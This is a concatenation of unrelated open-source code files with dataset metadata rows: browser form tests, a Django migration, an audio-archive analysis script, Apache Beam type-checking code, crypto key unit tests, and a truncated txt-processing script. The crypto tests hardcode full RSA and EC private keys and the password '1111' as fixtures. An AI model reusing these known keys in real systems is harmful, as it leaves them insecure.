browser.select('interested_states', state1.id)
browser.find_by_css('[type=submit]')[0].click()
assert browser.is_text_present('This field is required.')
# location check
browser.fill('mobile', '1234567890')
browser.select('interested_sections', section1.id)
browser.select('interested_states', state1.id)
browser.find_by_css('[type=submit]')[0].click()
assert browser.is_text_present('This field is required.')
# Use first name and last name
browser.fill('mobile', '1234567890')
browser.select('interested_sections', section1.id)
browser.select('interested_states', state1.id)
browser.select('location', location1.id)
browser.find_by_css('[type=submit]')[0].click()
assert browser.is_text_present('This field is required.')
# occupation is required
browser.fill('first_name', 'First Name')
browser.fill('last_name', 'Last Name')
browser.fill('mobile', '1234567890')
browser.select('interested_sections', section1.id)
browser.select('interested_states', state1.id)
browser.select('location', location1.id)
browser.find_by_css('[type=submit]')[0].click()
assert browser.is_text_present('This field is required.')
# Sucess case
browser = base.profile_poc_create(
browser, url, None,
section1.id, state1.id, location1.id)
assert browser.is_text_present('Deactive Account')
def test_signup_tutor_flow(base_url, browser, outbox):
tutor_type = create_user_type(slug='tutor')
user = create_user_verify_login(base_url, browser, outbox)
browser.fill('login', user.email)
browser.fill('password', '123123')
browser.find_by_css('[type=submit]')[0].click()
# assert browser.is_text_present("My Profile")
poc_type = f.create_usertype(slug='poc', display_name='College POC')
user.profile.usertype.clear()
user.profile.usertype.add(tutor_type)
user.profile.usertype.add(poc_type)
user.profile.save()
user.save()
section1 = f.create_workshop_section(name='section1')
location1 = f.create_locaiton(name='location1')
state1 = f.create_state(name='state1')
# mobile number chechk
url = base_url + '/profile/' + user.username + '/edit'
browser.visit(url)
browser.fill('mobile', '')
browser.select('usertype', tutor_type.id)
browser.select('interested_sections', section1.id)
browser.select('location', location1.id)
browser.select('interested_states', state1.id)
browser.find_by_css('[type=submit]')[0].click()
assert browser.is_text_present('This field is required.')
# interested state check
browser.visit(url)
browser.fill('mobile', '1234567890')
browser.select('location', location1.id)
browser.select('interested_states', state1.id)
browser.find_by_css('[type=submit]')[0].click()
assert browser.is_text_present('This field is required.')
# location check
browser.visit(url)
browser.fill('mobile', '1234567890')
browser.select('interested_sections', section1.id)
browser.select('interested_states', state1.id)
browser.find_by_css('[type=submit]')[0].click()
assert browser.is_text_present('This field is required.')
# Github check
browser.visit(url)
browser.fill('mobile', '1234567890')
browser.select('interested_sections', section1.id)
browser.select('interested_states', state1.id)
browser.select('location', location1.id)
browser.find_by_css('[type=submit]')[0].click()
assert browser.is_text_present('Github or LinkedIn field is mandatory')
browser.visit(url)
browser.fill('mobile', '1234567890')
browser.select('interested_sections', section1.id)
browser.select('interested_states', state1.id)
browser.select('location', location1.id)
browser.fill('github', 'https://github.com')
browser.find_by_css('[type=submit]')[0].click()
assert browser.is_text_present(
'Interested workshop level field is mandatory')
browser.visit(url)
browser.fill('mobile', '1234567890')
browser.select('interested_sections', section1.id)
browser.select('interested_states', state1.id)
browser.select('interested_level', 1)
browser.select('location', location1.id)
browser.fill('github', 'https://github.com')
browser.find_by_css('[type=submit]')[0].click()
assert browser.is_text_present('This field is required.')
browser = base.profile_tutor_create(
browser, url, tutor_type.id, section1.id, state1.id, location1.id)
assert browser.is_text_present('Deactive Account')
org = f.create_organisation(location=location1)
org.user.add(user)
# section2 = f.create_workshop_section(name='section2')
w1 = f.create_workshop(requester=org, workshop_section=section1)
w1.presenter.add(user)
w2 = f.create_workshop(requester=org, workshop_section=section1)
w2.presenter.add(user)
w3 = f.create_workshop(requester=org, workshop_section=section1)
w3.presenter.add(user)
w4 = f.create_workshop(requester=org, workshop_section=section1)
w4.presenter.add(user)
w5 = f.create_workshop(requester=org, workshop_section=section1)
w5.presenter.add(user)
url = base_url + '/profile/' + user.username + '/'
browser.visit(url)
# assert browser.is_text_present('Deactive Account')
|
mit
| -2,212,431,880,996,849,200
| 36.944134
| 75
| 0.686543
| false
| 3.38247
| false
| false
| false
|
shawnhermans/cyborg-identity-manager
|
cyborg_identity/migrations/0003_auto_20150628_2144.py
|
1
|
1089
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('cyborg_identity', '0002_iscontactemailaddress_iscontactphonenumber_phonenumber'),
]
operations = [
migrations.RemoveField(
model_name='emailaddress',
name='node_ptr',
),
migrations.RemoveField(
model_name='iscontactemailaddress',
name='relationship_ptr',
),
migrations.RemoveField(
model_name='iscontactphonenumber',
name='relationship_ptr',
),
migrations.RemoveField(
model_name='phonenumber',
name='node_ptr',
),
migrations.DeleteModel(
name='EmailAddress',
),
migrations.DeleteModel(
name='IsContactEmailAddress',
),
migrations.DeleteModel(
name='IsContactPhoneNumber',
),
migrations.DeleteModel(
name='PhoneNumber',
),
]
|
mit
| -3,159,675,205,751,116,000
| 24.928571
| 91
| 0.55831
| false
| 4.556485
| false
| false
| false
|
HaroldMills/Vesper
|
scripts/detector_eval/manual/analyze_classification_edits.py
|
1
|
5201
|
"""
Script that analyzes the classification edits of an archive.
The analysis focuses on changes user "dleick" made to classifications
created by user "cvoss", in order to inform decisions about how to most
efficiently direct classification effort.
"""
from collections import defaultdict
import sqlite3
# Set up Django. This must happen before any use of Django, including
# ORM class imports.
import vesper.util.django_utils as django_utils
django_utils.set_up_django()
from vesper.django.app.models import AnnotationInfo, Processor, User
ANNOTATION_NAME = 'Classification'
DETECTOR_NAMES = frozenset([
'BirdVoxDetect 0.1.a0 AT 05',
'MPG Ranch Thrush Detector 0.0 40',
'MPG Ranch Tseep Detector 0.0 40'
])
DATABASE_FILE_NAME = 'Archive Database.sqlite'
QUERY = '''
select e.clip_id, e.action, e.value, e.creating_user_id, e.creation_time
from vesper_string_annotation_edit as e
join vesper_clip as c on e.clip_id = c.id
where c.creating_processor_id = ?
and e.info_id = ?
and e.creation_time >= ?;
'''
START_DATE = '2019-04-01'
def main():
annotation_info = AnnotationInfo.objects.get(name=ANNOTATION_NAME)
users = get_users()
for processor in Processor.objects.all():
if processor.name in DETECTOR_NAMES:
print('{}:'.format(processor.name))
edits = get_classification_edits(processor.id, annotation_info.id)
analyze_edits(edits, users)
def get_users():
return dict((u.id, u.username) for u in User.objects.all())
def get_classification_edits(detector_id, annotation_info_id):
connection = sqlite3.connect(DATABASE_FILE_NAME)
values = (detector_id, annotation_info_id, START_DATE)
with connection:
rows = connection.execute(QUERY, values)
edits = defaultdict(list)
for clip_id, action, value, user_id, time in rows:
edits[clip_id].append((action, value, user_id, time))
connection.close()
return edits
def analyze_edits(edit_lists, user_names):
history_counts = count_edit_histories(edit_lists, user_names)
change_counts = count_changes(history_counts)
# print(' history counts:')
# histories = sorted(history_counts.keys())
# for history in histories:
# print(' {} {}'.format(history, history_counts[history]))
print(" Debbie's classification change counts:")
changes = sorted(change_counts.keys())
for old, new in changes:
count = change_counts[(old, new)]
print(' {} -> {} {}'.format(old, new, count))
num_changes = sum(change_counts.values())
total_num_clips = sum(history_counts.values())
changed_percent = 100 * num_changes / total_num_clips
print((
" Debbie changed Carrie's classifications for {} of {} clips, "
'or {:.1f} percent.').format(
num_changes, total_num_clips, changed_percent))
def count_edit_histories(edit_lists, user_names):
counts = defaultdict(int)
clip_ids = sorted(edit_lists.keys())
for clip_id in clip_ids:
edits = edit_lists[clip_id]
histories = tuple([get_count_key(e, user_names) for e in edits])
counts[histories] += 1
return counts
def get_count_key(edit, user_names):
action, classification, user_id, _ = edit
if user_id is None:
user_name = 'transfer'
else:
user_name = user_names[user_id]
if action == 'S':
return (user_name, classification)
elif action == 'D':
return (user_name, 'Unclassified')
else:
raise ValueError('Unrecognized edit action "{}".'.format(action))
def count_changes(history_counts):
change_counts = defaultdict(int)
for edits, count in history_counts.items():
if edits[-1][0] == 'dleick':
# Debbie made final edit in this history
debbie_classification = edits[-1][1]
i = find_final_carrie_edit(edits)
if i == -1:
# history includes no Carrie edits
accumulate_change_count(
change_counts, 'Unclassified', debbie_classification,
count)
else:
# history includes at least one Carrie edit
carrie_classification = edits[i][1]
accumulate_change_count(
change_counts, carrie_classification,
debbie_classification, count)
return change_counts
def find_final_carrie_edit(edits):
for i, (name, _) in enumerate(reversed(edits)):
if name == 'cvoss':
return len(edits) - i - 1
return -1
def accumulate_change_count(change_counts, old, new, count):
if new != old and not (old == 'Unclassified' and new == 'Noise'):
change_counts[(old, new)] += count
if __name__ == '__main__':
main()
|
mit
| -7,949,347,712,655,548,000
| 26.962366
| 78
| 0.585849
| false
| 3.824265
| false
| false
| false
|
aaltay/beam
|
sdks/python/apache_beam/typehints/typecheck.py
|
1
|
12441
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Runtime type checking support.
For internal use only; no backwards-compatibility guarantees.
"""
# pytype: skip-file
from __future__ import absolute_import
import collections
import inspect
import types
from future.utils import raise_with_traceback
from past.builtins import unicode
from apache_beam import pipeline
from apache_beam.pvalue import TaggedOutput
from apache_beam.transforms import core
from apache_beam.transforms.core import DoFn
from apache_beam.transforms.window import WindowedValue
from apache_beam.typehints.decorators import GeneratorWrapper
from apache_beam.typehints.decorators import TypeCheckError
from apache_beam.typehints.decorators import _check_instance_type
from apache_beam.typehints.decorators import getcallargs_forhints
from apache_beam.typehints.typehints import CompositeTypeHintError
from apache_beam.typehints.typehints import SimpleTypeHintError
from apache_beam.typehints.typehints import check_constraint
class AbstractDoFnWrapper(DoFn):
"""An abstract class to create wrapper around DoFn"""
def __init__(self, dofn):
super(AbstractDoFnWrapper, self).__init__()
self.dofn = dofn
def _inspect_start_bundle(self):
return self.dofn.get_function_arguments('start_bundle')
def _inspect_process(self):
return self.dofn.get_function_arguments('process')
def _inspect_finish_bundle(self):
return self.dofn.get_function_arguments('finish_bundle')
def wrapper(self, method, args, kwargs):
return method(*args, **kwargs)
def setup(self):
return self.dofn.setup()
def start_bundle(self, *args, **kwargs):
return self.wrapper(self.dofn.start_bundle, args, kwargs)
def process(self, *args, **kwargs):
return self.wrapper(self.dofn.process, args, kwargs)
def finish_bundle(self, *args, **kwargs):
return self.wrapper(self.dofn.finish_bundle, args, kwargs)
def teardown(self):
return self.dofn.teardown()
class OutputCheckWrapperDoFn(AbstractDoFnWrapper):
"""A DoFn that verifies against common errors in the output type."""
def __init__(self, dofn, full_label):
super(OutputCheckWrapperDoFn, self).__init__(dofn)
self.full_label = full_label
def wrapper(self, method, args, kwargs):
try:
result = method(*args, **kwargs)
except TypeCheckError as e:
# TODO(BEAM-10710): Remove the 'ParDo' prefix for the label name
error_msg = (
'Runtime type violation detected within ParDo(%s): '
'%s' % (self.full_label, e))
raise_with_traceback(TypeCheckError(error_msg))
else:
return self._check_type(result)
@staticmethod
def _check_type(output):
if output is None:
return output
elif isinstance(output, (dict, bytes, str, unicode)):
object_type = type(output).__name__
raise TypeCheckError(
'Returning a %s from a ParDo or FlatMap is '
'discouraged. Please use list("%s") if you really '
'want this behavior.' % (object_type, output))
elif not isinstance(output, collections.Iterable):
raise TypeCheckError(
'FlatMap and ParDo must return an '
'iterable. %s was returned instead.' % type(output))
return output
class TypeCheckWrapperDoFn(AbstractDoFnWrapper):
"""A wrapper around a DoFn which performs type-checking of input and output.
"""
def __init__(self, dofn, type_hints, label=None):
super(TypeCheckWrapperDoFn, self).__init__(dofn)
self._process_fn = self.dofn._process_argspec_fn()
if type_hints.input_types:
input_args, input_kwargs = type_hints.input_types
self._input_hints = getcallargs_forhints(
self._process_fn, *input_args, **input_kwargs)
else:
self._input_hints = None
# TODO(robertwb): Multi-output.
self._output_type_hint = type_hints.simple_output_type(label)
def wrapper(self, method, args, kwargs):
result = method(*args, **kwargs)
return self._type_check_result(result)
def process(self, *args, **kwargs):
if self._input_hints:
actual_inputs = inspect.getcallargs(self._process_fn, *args, **kwargs) # pylint: disable=deprecated-method
for var, hint in self._input_hints.items():
if hint is actual_inputs[var]:
# self parameter
continue
_check_instance_type(hint, actual_inputs[var], var, True)
return self._type_check_result(self.dofn.process(*args, **kwargs))
def _type_check_result(self, transform_results):
if self._output_type_hint is None or transform_results is None:
return transform_results
def type_check_output(o):
# TODO(robertwb): Multi-output.
x = o.value if isinstance(o, (TaggedOutput, WindowedValue)) else o
self.type_check(self._output_type_hint, x, is_input=False)
# If the return type is a generator, then we will need to interleave our
# type-checking with its normal iteration so we don't deplete the
# generator initially just by type-checking its yielded contents.
if isinstance(transform_results, types.GeneratorType):
return GeneratorWrapper(transform_results, type_check_output)
for o in transform_results:
type_check_output(o)
return transform_results
@staticmethod
def type_check(type_constraint, datum, is_input):
"""Typecheck a PTransform related datum according to a type constraint.
This function is used to optionally type-check either an input or an output
to a PTransform.
Args:
type_constraint: An instance of a typehints.TypeContraint, one of the
white-listed builtin Python types, or a custom user class.
datum: An instance of a Python object.
is_input: True if 'datum' is an input to a PTransform's DoFn. False
otherwise.
Raises:
TypeError: If 'datum' fails to type-check according to 'type_constraint'.
"""
datum_type = 'input' if is_input else 'output'
try:
check_constraint(type_constraint, datum)
except CompositeTypeHintError as e:
raise_with_traceback(TypeCheckError(e.args[0]))
except SimpleTypeHintError:
error_msg = (
"According to type-hint expected %s should be of type %s. "
"Instead, received '%s', an instance of type %s." %
(datum_type, type_constraint, datum, type(datum)))
raise_with_traceback(TypeCheckError(error_msg))
class TypeCheckCombineFn(core.CombineFn):
"""A wrapper around a CombineFn performing type-checking of input and output.
"""
def __init__(self, combinefn, type_hints, label=None):
self._combinefn = combinefn
self._input_type_hint = type_hints.input_types
self._output_type_hint = type_hints.simple_output_type(label)
self._label = label
def setup(self, *args, **kwargs):
self._combinefn.setup(*args, **kwargs)
def create_accumulator(self, *args, **kwargs):
return self._combinefn.create_accumulator(*args, **kwargs)
def add_input(self, accumulator, element, *args, **kwargs):
if self._input_type_hint:
try:
_check_instance_type(
self._input_type_hint[0][0].tuple_types[1],
element,
'element',
True)
except TypeCheckError as e:
error_msg = (
'Runtime type violation detected within %s: '
'%s' % (self._label, e))
raise_with_traceback(TypeCheckError(error_msg))
return self._combinefn.add_input(accumulator, element, *args, **kwargs)
def merge_accumulators(self, accumulators, *args, **kwargs):
return self._combinefn.merge_accumulators(accumulators, *args, **kwargs)
def compact(self, accumulator, *args, **kwargs):
return self._combinefn.compact(accumulator, *args, **kwargs)
def extract_output(self, accumulator, *args, **kwargs):
result = self._combinefn.extract_output(accumulator, *args, **kwargs)
if self._output_type_hint:
try:
_check_instance_type(
self._output_type_hint.tuple_types[1], result, None, True)
except TypeCheckError as e:
error_msg = (
'Runtime type violation detected within %s: '
'%s' % (self._label, e))
raise_with_traceback(TypeCheckError(error_msg))
return result
def teardown(self, *args, **kwargs):
self._combinefn.teardown(*args, **kwargs)
class TypeCheckVisitor(pipeline.PipelineVisitor):
_in_combine = False
def enter_composite_transform(self, applied_transform):
if isinstance(applied_transform.transform, core.CombinePerKey):
self._in_combine = True
self._wrapped_fn = applied_transform.transform.fn = TypeCheckCombineFn(
applied_transform.transform.fn,
applied_transform.transform.get_type_hints(),
applied_transform.full_label)
def leave_composite_transform(self, applied_transform):
if isinstance(applied_transform.transform, core.CombinePerKey):
self._in_combine = False
def visit_transform(self, applied_transform):
transform = applied_transform.transform
if isinstance(transform, core.ParDo):
if self._in_combine:
if isinstance(transform.fn, core.CombineValuesDoFn):
transform.fn.combinefn = self._wrapped_fn
else:
transform.fn = transform.dofn = OutputCheckWrapperDoFn(
TypeCheckWrapperDoFn(
transform.fn,
transform.get_type_hints(),
applied_transform.full_label),
applied_transform.full_label)
class PerformanceTypeCheckVisitor(pipeline.PipelineVisitor):
def visit_transform(self, applied_transform):
transform = applied_transform.transform
full_label = applied_transform.full_label
# Store output type hints in current transform
output_type_hints = self.get_output_type_hints(transform)
if output_type_hints:
transform._add_type_constraint_from_consumer(
full_label, output_type_hints)
# Store input type hints in producer transform
input_type_hints = self.get_input_type_hints(transform)
if input_type_hints and len(applied_transform.inputs):
producer = applied_transform.inputs[0].producer
if producer:
producer.transform._add_type_constraint_from_consumer(
full_label, input_type_hints)
def get_input_type_hints(self, transform):
type_hints = transform.get_type_hints()
input_types = None
if type_hints.input_types:
normal_hints, kwarg_hints = type_hints.input_types
if kwarg_hints:
input_types = kwarg_hints
if normal_hints:
input_types = normal_hints
parameter_name = 'Unknown Parameter'
if hasattr(transform, 'fn'):
try:
argspec = inspect.getfullargspec(transform.fn._process_argspec_fn())
except TypeError:
# An unsupported callable was passed to getfullargspec
pass
else:
if len(argspec.args):
arg_index = 0
if argspec.args[0] == 'self' and len(argspec.args) > 1:
arg_index = 1
parameter_name = argspec.args[arg_index]
if isinstance(input_types, dict):
input_types = (input_types[argspec.args[arg_index]], )
if input_types and len(input_types):
input_types = input_types[0]
return parameter_name, input_types
def get_output_type_hints(self, transform):
type_hints = transform.get_type_hints()
output_types = None
if type_hints.output_types:
normal_hints, kwarg_hints = type_hints.output_types
if kwarg_hints:
output_types = kwarg_hints
if normal_hints:
output_types = normal_hints
if output_types and len(output_types):
output_types = output_types[0]
return None, output_types
|
apache-2.0
| -7,856,147,975,945,957,000
| 35.06087
| 113
| 0.685958
| false
| 3.857674
| false
| false
| false
|
vbwagner/ctypescrypto
|
tests/testpkey.py
|
1
|
9134
|
from ctypescrypto.pkey import PKey
from ctypescrypto import pyver
import unittest,re
from base64 import b64decode, b16decode
from subprocess import Popen,PIPE,CalledProcessError
def pem2der(s):
start=s.find('-----\n')
finish=s.rfind('\n-----END')
data=s[start+6:finish]
return b64decode(data)
def runopenssl(args,indata):
p=Popen(['openssl']+args,stdin=PIPE,stdout=PIPE,stderr=PIPE)
(out,err)=p.communicate(indata)
if p.returncode:
raise CalledProcessError(p.returncode," ".join(['openssl']+args)+":"+err)
if pyver > 2:
out = out.decode("utf-8")
return out
class TestPKey(unittest.TestCase):
rsa="""-----BEGIN PRIVATE KEY-----
MIICdQIBADANBgkqhkiG9w0BAQEFAASCAl8wggJbAgEAAoGBAL9CzVZu9bczTmB8
776pPUoPo6WbAfwQqqiGrj91bk2mYE+MNLo4yIQH45IcwGzkyS8+YyQJf8Bux5BC
oZ2nwzXm5+JZkxkN1mtMzit2D7/hHmrZLoSbr0sxXFrD4a35RI4hXnSK9Sk01sXA
Te2OgHzm5nk1sG97G6SFq7CHe3gvAgMBAAECgYAgGV8K7Y5xk7vIt88oyZCOuHc3
mP9JRabOp+PgpJ3BjHXHg/lpc5Q7jHNmF0s4O2GEe0z6RFnbevwlOvmS0xAQ1hpg
5TnVVkiZvcJeQaZqWIlEOaLqA12YdhSyorfB6p3tfQ7ZmQusg3SCsru5kPJV4sm0
I+MuRCQZWSzIqelloQJBAPbtScJI0lXx8sktntZi69cAVvLtz5z1T7bZwFakNkNE
SUCjNc/hEEI6/1LScV8Kx9kgQ0+W8smu+GyUDceyVFECQQDGSeS7cTmojkiPQxPB
zb0vS+Nfpq6oYsx+gn5TBgMeWIZZrtMEaUU2o+rwsjKBP/gy6D1zC2b4W5O/A/7a
1GR/AkBUQhYoKKc1UpExGtMXfrvRKrmAvatZeM/Rqi4aooAtpfCFEOw82iStJOqY
/VxYPRqCuaKeVvjT31O/4SlumihxAkBahRU0NKYbuoiJThfQ23lIBB7SZadKG4A7
KJs+j3oQ+lyqyFJwqxX7sazpIJBJzMgjhT24LTZenn++LbbEcz1FAkBmDmxoq7qO
Ao6uTm8fnkD4C836wS4mYAPqwRBK1JvnEXEQee9irf+ip89BAg74ViTcGF9lwJwQ
gOM+X5Db+3pK
-----END PRIVATE KEY-----
"""
rsaenc="""-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-256-CBC,7FF0E46291D60D35ACA881131C244655
BeJoui1lRQDvvPr+gH8xCdqkcgKCLWpZTvFZmvrqXmPqMHpm20nK0ESAd6kKm8d1
zaglRIHnnO6V7aDcwgOd3IYPEOnG2TIRQniZrwZdrXIfacscJ6Ekq+5YfLuyrRgq
fscGl7ntm/eGLqwrhzuv7jAXpn9QWiiAld0EWcmZCAW7nGaUQtu4rc4ULwL5SC/M
MOCPwpcD3SCQv55dX3cBOtfZ3lPbpgEpTpnNnj8OtxOkkIaG8yol7luwHvoOSyL/
WuXGCpfJE4LzbxnSLhbiN7q+y/Sro3cGc9aO4tXToMqTFel4zqR0YgOeFazlDRi1
mPuZcGLuSIef0kJn7Mg7jt0DQk579rTVxAhIu2rylTwEozkpCp5g4kGTJON++HQr
BRrApm4XlAoH2GX1jqDBoWSnXCRH49jNGQrLwy469i+994cG8uVU9Z5cqm/LDIR9
kwQfTJIvMi0g28NBMVgJ2gLj40OczxDGyNvBIbhPNswHljfsvPVr4vtxDGx8fS0N
lUJUOL9me+XNZ5xGHYuT5DOr7GE+H3hKEg+XfrYEete9BeI4gm9cqESvrLY9EU5Q
tOtnKKL7SglTZ5LxPMAedADC0o01nzr+D3gAiOhSgoZTrnQsSZ7iTJOtm3vNXwJx
AgesYmXtr5mdiBPKQ1QA/jF5LUZji+5KENd5WHNQw7tOlMLDrPFVRfLZg1AQDljx
u16kdyb71Kk3f6GCOfUntGr+kzppc3DDT+RcLetXphOOEQRy6C6/wmz08WlAPlu5
mFfSDijpWxoUHooQISg5mE82oR8V81aBpbLtm7KevwY=
-----END RSA PRIVATE KEY-----
"""
pkcs8crypt="""-----BEGIN ENCRYPTED PRIVATE KEY-----
MIICoTAbBgkqhkiG9w0BBQMwDgQIipVEnsV/gQoCAggABIICgE1i42C4aBhykhOi
EItFRE+9iBgiklGxoCJtukdp1UwDRKy/GJJ1rcS385CQy4Rs0zN8NH1faVRbf4Vt
iNACHtJx30qMCdo64CR+GJYHS4g2lGaz7PFNma8SjnAbGYXwXkdm5zhwmiU++wC7
W59u8oWS8Dj9dZBMzoOQGQT6xzZwQ14H65zHvC16HdKSNtRgXDWkBnD2cQzuOyuf
rFLyEf7/FH6B7/yKDcwsEfu97uPPxMvuusD1UubWnltO/Hc2oCPibN+dGw1PY9mC
18yGQtZkf5z30yhLosF62IVy3XY9Yf/TJYojIExoASrThGRvENzWkQ3qfnErqmng
l+dy66bmLjicobF5bO3xAhpU1dL+4/1ba2QuthVNlg6Or/iII1ntNN4PFyYcEwmX
e09C3dyOtV7qCq13S1bRkbZhzwi2QbLKALAzrZpF6VYmayTz8KjQOZ8BncAM+BiI
CtwuZJoXLW9kT4D7UsaSZdjUvzBIak5qdCGWpKmahMfjEEsCg6ApuIYmFrCgiY9c
0keYjY8DJ+4bEvqsQvTIaU9F9mFytI1E3LnR0NP1jHuOA7Jc+oNQ2adgFNj12jKQ
qNt1bEGNCqQHSrw7JNCrB7s+QAFNqJtno6fIq7vVNkqadJlnBbCIgm7NlJeGg9j6
a5YVNGlbs0J4dQF4Jw13302IBn3piSzthWL2gL98v/1lEwGuernEpPAjry3YhzM9
VA/oVt22n3yVA6dOSVL1oUTJyawEqASmH0jHAzXNDz+QLSLmz82ARcZPqPvVc45e
5h0xtqtFVkQLNbYzpNWGrx7R1hdr84nOKa8EsIxTRgEL/w9Y4Z/3xEoK2+KVBpMk
oxUuxuU=
-----END ENCRYPTED PRIVATE KEY-----
"""
password="1111"
rsakeytext="""Public-Key: (1024 bit)
Modulus:
00:bf:42:cd:56:6e:f5:b7:33:4e:60:7c:ef:be:a9:
3d:4a:0f:a3:a5:9b:01:fc:10:aa:a8:86:ae:3f:75:
6e:4d:a6:60:4f:8c:34:ba:38:c8:84:07:e3:92:1c:
c0:6c:e4:c9:2f:3e:63:24:09:7f:c0:6e:c7:90:42:
a1:9d:a7:c3:35:e6:e7:e2:59:93:19:0d:d6:6b:4c:
ce:2b:76:0f:bf:e1:1e:6a:d9:2e:84:9b:af:4b:31:
5c:5a:c3:e1:ad:f9:44:8e:21:5e:74:8a:f5:29:34:
d6:c5:c0:4d:ed:8e:80:7c:e6:e6:79:35:b0:6f:7b:
1b:a4:85:ab:b0:87:7b:78:2f
Exponent: 65537 (0x10001)
"""
ec1priv="""-----BEGIN PRIVATE KEY-----
MIGEAgEAMBAGByqGSM49AgEGBSuBBAAKBG0wawIBAQQgKnG6neqZvB98EEuuxnHs
fv+L/5abuNNG20wzUqRpncOhRANCAARWKXWeUZ6WiCKZ2kHx87jmJyx0G3ZB1iQC
+Gp2AJYswbQPhGPigKolzIbZYfwnn7QOca6N8QDhPAn3QQK8trZI
-----END PRIVATE KEY-----
"""
ec1keytext="""Public-Key: (256 bit)
pub:
04:56:29:75:9e:51:9e:96:88:22:99:da:41:f1:f3:
b8:e6:27:2c:74:1b:76:41:d6:24:02:f8:6a:76:00:
96:2c:c1:b4:0f:84:63:e2:80:aa:25:cc:86:d9:61:
fc:27:9f:b4:0e:71:ae:8d:f1:00:e1:3c:09:f7:41:
02:bc:b6:b6:48
ASN1 OID: secp256k1
"""
ec1pub="""-----BEGIN PUBLIC KEY-----
MFYwEAYHKoZIzj0CAQYFK4EEAAoDQgAEVil1nlGelogimdpB8fO45icsdBt2QdYk
AvhqdgCWLMG0D4Rj4oCqJcyG2WH8J5+0DnGujfEA4TwJ90ECvLa2SA==
-----END PUBLIC KEY-----
"""
def test_unencrypted_pem(self):
key=PKey(privkey=self.rsa)
self.assertTrue(key.cansign)
self.assertIsNotNone(key.key)
self.assertEqual(str(key),self.rsakeytext)
def test_encrypted_pem(self):
key=PKey(privkey=self.rsaenc,password=self.password)
self.assertIsNotNone(key.key)
self.assertEqual(str(key),self.rsakeytext)
def test_encrypted_pem_cb(self):
cb=lambda x:self.password
key=PKey(privkey=self.rsaenc,password=cb)
self.assertIsNotNone(key.key)
self.assertEqual(str(key),self.rsakeytext)
def test_encryped_pem_pkcs8(self):
key=PKey(privkey=self.pkcs8crypt,password=self.password)
self.assertIsNotNone(key.key)
self.assertEqual(str(key),self.rsakeytext)
def test_encrypted_der_pkcs8(self):
pkcs8der = pem2der(self.pkcs8crypt)
key=PKey(privkey=pkcs8der,password=self.password,format="DER")
self.assertIsNotNone(key.key)
self.assertEqual(str(key),self.rsakeytext)
def test_export_priv_pem(self):
key=PKey(privkey=self.ec1priv)
out=key.exportpriv()
self.assertEqual(self.ec1priv,out)
def test_export_priv_encrypt(self):
from ctypescrypto.cipher import CipherType
key=PKey(privkey=self.rsa)
pem=key.exportpriv(password='2222',cipher=CipherType("aes256"))
if pyver >2:
pem = pem.encode("ascii")
self.assertEqual(runopenssl(["pkey","-text_pub","-noout","-passin","pass:2222"],
pem),self.rsakeytext)
def test_export_priv_der(self):
key=PKey(privkey=self.rsa)
der=key.exportpriv(format="DER")
self.assertEqual(runopenssl(["pkey","-text_pub","-noout","-inform","DER"],
der),self.rsakeytext)
def test_export_priv_der_enc(self):
from ctypescrypto.cipher import CipherType
key=PKey(privkey=self.rsa)
der=key.exportpriv(format="DER",password='2222',cipher=CipherType("aes256"))
self.assertEqual(runopenssl(["pkcs8","-passin","pass:2222","-inform","DER"],
der),self.rsa)
def test_unencrypted_pem_ec(self):
key=PKey(privkey=self.ec1priv)
self.assertIsNotNone(key.key)
self.assertEqual(re.sub("pub: \n","pub:\n",str(key)),self.ec1keytext)
def test_unencrypted_der_ec(self):
key=PKey(privkey=pem2der(self.ec1priv),format="DER")
self.assertIsNotNone(key.key)
self.assertEqual(re.sub("pub: \n","pub:\n",str(key)),self.ec1keytext)
def test_pubkey_pem(self):
key=PKey(pubkey=self.ec1pub)
self.assertIsNotNone(key.key)
self.assertEqual(re.sub("pub: \n","pub:\n",str(key)),self.ec1keytext)
def test_pubkey_der(self):
key=PKey(pubkey=pem2der(self.ec1pub),format="DER")
self.assertIsNotNone(key.key)
self.assertEqual(re.sub("pub: \n","pub:\n",str(key)),self.ec1keytext)
def test_compare(self):
key1=PKey(privkey=self.ec1priv)
self.assertIsNotNone(key1.key)
key2=PKey(pubkey=self.ec1pub)
self.assertIsNotNone(key2.key)
self.assertEqual(key1,key2)
def test_sign(self):
signer=PKey(privkey=self.ec1priv)
digest=b16decode("FFCA2587CFD4846E4CB975B503C9EB940F94566AA394E8BD571458B9DA5097D5")
signature=signer.sign(digest)
self.assertTrue(len(signature)>0)
verifier=PKey(pubkey=self.ec1pub)
self.assertTrue(verifier.verify(digest,signature))
def test_generate(self):
newkey=PKey.generate("rsa")
self.assertIsNotNone(newkey.key)
s=str(newkey)
self.assertEqual(s[:s.find("\n")],"Public-Key: (1024 bit)")
def test_generate_params(self):
newkey=PKey.generate("rsa",rsa_keygen_bits=2048)
self.assertIsNotNone(newkey.key)
s=str(newkey)
self.assertEqual(s[:s.find("\n")],"Public-Key: (2048 bit)")
def test_generate_ec(self):
templkey=PKey(pubkey=self.ec1pub)
newkey=PKey.generate("ec",paramsfrom=templkey)
self.assertIsNotNone(newkey.key)
s=str(newkey)
self.assertEqual(s[:s.find("\n")],"Public-Key: (256 bit)")
self.assertNotEqual(str(templkey),str(newkey))
if __name__ == "__main__":
unittest.main()
|
mit
| -7,343,754,033,386,160,000
| 43.125604
| 92
| 0.737464
| false
| 2.072142
| true
| false
| false
|
x522758754/XlsTools
|
xlsDelCol.py
|
1
|
3807
|
#!/user/bin/env python
# coding:utf-8
import sys
import os
import codecs
import pandas as pd
reload(sys)
sys.setdefaultencoding('utf-8')
#删除的列 从0开始
DELCOL = 1
_DictFileCoding = dict()
def GetAllTxt(srcPath, dstPath):
#print path
srcfiles = []
dstfiles = []
for root, dirs, files in os.walk(srcPath):
for f in files:
if f.endswith('.txt'):
srcfile = os.path.join(root, f)
srcfiles.append(srcfile)
#filePath = filePath.replace('\\','/')
